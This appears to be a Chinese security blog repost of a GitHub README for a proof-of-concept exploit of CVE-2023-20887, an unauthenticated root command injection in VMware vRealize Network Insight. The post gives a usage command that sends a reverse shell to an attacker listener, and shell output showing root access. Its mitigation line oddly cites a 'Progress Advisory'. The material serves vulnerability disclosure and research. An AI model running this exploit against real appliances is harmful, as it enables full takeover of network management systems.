VMWare vRealize Network Insight 预认证远程代码执行漏洞(CVE-2023-20887)

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/sinsinology/CVE-2023-20887

小编推荐

本项目是一个POC,用于利用CVE-2023-20887漏洞,使没有认证的远程攻击者能够在VMware Aria Operations for Networks(vRealize Network Insight)中执行任意命令,包括在操作系统下以root用户的身份执行命令。

相关技术点

  • CVE-2023-20887漏洞:指VMware Aria Operations for Networks(vRealize Network Insight)在接受用户输入时,通过Apache Thrift RPC接口存在命令注入漏洞,远程未认证攻击者可以利用此漏洞在操作系统下执行任意命令,包括在操作系统下以root用户的身份执行命令。
  • CVSSv3:计算漏洞严重性的开放标准。
  • RPC接口:远程过程调用(RPC)是一种协议,用于在网络上从一个计算机程序向另一个计算机程序请求服务。RPC通常使用客户端/服务器模式。
  • 反向代理:反向代理是一种服务器,它接受来自客户端的 Internet 流量,并将该流量转发到托管在其后面的服务器。

项目用途

该项目提供一个POC,用于利用CVE-2023-20887漏洞,使没有认证的远程攻击者能够在VMware Aria Operations for Networks(vRealize Network Insight)中执行任意命令,包括在操作系统下以root用户的身份执行命令。

Mitigations

更新到最新版本或按照进展公告中的说明进行缓解:

免责声明

此软件仅用于学术研究和开发有效的防御技术,不打算用于攻击系统,除非经过明确授权。项目维护人员对软件的误用不负责任。请负责任地使用。

CVE-2023-20887

VMware Aria Operations for Networks (vRealize Network Insight) 未经身份验证的远程命令执行漏洞(CVE-2023-20887)的 POC

技术分析

该漏洞的根本原因分析可在我的博客中找到: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

2d32ae0bbe203944

 

 

概要

VMware Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时存在命令注入漏洞。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受反向代理保护,但可以绕过。VMware 已将此问题的严重性评估为严重级别,其最大 CVSSv3 基础分数为 9.8。 恶意行为者可以在设备上获取 root 上下文中的远程代码执行。 VMware 6.x 版本存在漏洞。

使用

python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

缓解措施

更新到最新版本或按照 Progress Advisory 中的说明进行缓解

关注我们的 Twitter 获取最新的安全研究成果:

免责声明

此软件仅用于学术研究目的和有效防御技术的开发,不打算用于攻击系统,除非得到明确授权。项目维护者不对软件的误用负责或承担责任。请负责任地使用。

标签:工具分享, 漏洞分享, POC脚本